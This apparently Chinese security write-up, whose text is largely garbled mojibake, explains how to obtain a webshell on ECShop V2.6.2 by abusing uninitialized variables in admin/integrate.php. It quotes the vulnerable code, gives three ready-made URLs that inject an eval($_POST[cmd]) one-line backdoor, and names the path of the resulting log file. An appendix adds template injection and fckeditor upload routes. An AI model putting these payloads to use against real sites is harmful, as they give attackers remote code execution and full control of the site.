ECShopϵͳV2.6.2 ̨webshell


ʵã˼ɹˣֵǹٷΪֹûзӦв˿дڡģ-ĿͿˣô鷳ģregister_globalsľַûвԡ

Դ:oldjun

ECSHOPһԴѵ̵ϵͳרҵĿŶάΪṩʱЧļ֧֣ԸԼECSHOPжƣԼ̳ǵɫܡٷܣ

ECSHOPǰʱ˸ע©http://bbs.wolvez.org/topic/67/ų́ȨӦû⣬ûἰں̨shellt00ls.NetϷshellbaidu google£òûshellİ취þûˣECSHOP°棨V2.6.2ԴңҵһֱдshellļעһͬǸ仯δʼµ⣬ǣֻͬregister_globalsΪonĻ¡

integrate.php740

==============================================

if ($_REQUEST['act'] == 'sync')
{
$size = 100;

......

$tasks = array();
if ($task_del > 0)
{
$tasks[] = array('task_name'=>sprintf($_LANG['task_del'], $task_del),'task_status'=>'<span id="task_del">' . $_LANG['task_uncomplete'] . '<span>');
$sql = "SELECT user_name FROM " . $ecs->table('users') . " WHERE flag = 2";
$del_list = $db->getCol($sql);//$del_listδʼ

}

if ($task_rename > 0)
{
$tasks[] = array('task_name'=>sprintf($_LANG['task_rename'], $task_rename),'task_status'=>'<span id="task_rename">' . $_LANG['task_uncomplete'] . '</span>');
$sql = "SELECT user_name, alias FROM " . $ecs->table('users') . " WHERE flag = 3";
$rename_list = $db->getAll($sql);//$rename_listδʼ
}

if ($task_ignore >0)
{
$sql = "SELECT user_name FROM " . $ecs->table('users') . " WHERE flag = 4";
$ignore_list = $db->getCol($sql);//$ignore_listδʼ
}

......

/* ޸־ */
$fp = @fopen(ROOT_PATH . DATA_DIR . '/integrate_' . $_SESSION['code'] . '_log.php', 'wb');
$log = '';
if (isset($del_list))
{
$log .= '$del_list=' . var_export($del_list,true) . ';';
}
if (isset($rename_list))
{
$log .= '$rename_list=' . var_export($rename_list, true) . ';';
}
if (isset($ignore_list))
{
$log .= '$ignore_list=' . var_export($ignore_list, true) . ';';
}
//δˣֱдlog
fwrite($fp, $log);
fclose($fp);

$smarty->assign('tasks', $tasks);
$smarty->assign('ur_here',$_LANG['user_sync']);
$smarty->assign('size', $size);
$smarty->display('integrates_sync.htm');
}

==============================================

$del_list$rename_list$ignore_listûгʼǣֱдshell÷:

==============================================

http://www.oldjun.com/admin/integrate.php?act=sync&del_list=<?php%20eval($_POST[cmd])?>
http://www.oldjun.com/admin/integrate.php?act=sync&rename_list=<?php%20eval($_POST[cmd])?>
http://www.oldjun.com/admin/integrate.php?act=sync&ignore_list=<?php%20eval($_POST[cmd])?>

==============================================


ӣһͿˣhttp://www.oldjun.com/data/integrate__log.phpһ仰Сˡ

==============================================

䣺

ECShopȫ⣺
1
ڡģ-Ŀ
Ȼѡmyship.lbi
ģһ仰С
http://www.target.com/myship.phpļͿ,
ECshopsmartyģֱִphp.
ֱʹálankerһ仰PHPſͻ3.0ڲ桱

2
\includes\fckeditor\editor\filemanager\connectors\php\config.php
û mediaļͣ
ֱϴphpļ
δ½״̬ϴֻҪ½˺̨fckeditorͿϴļ
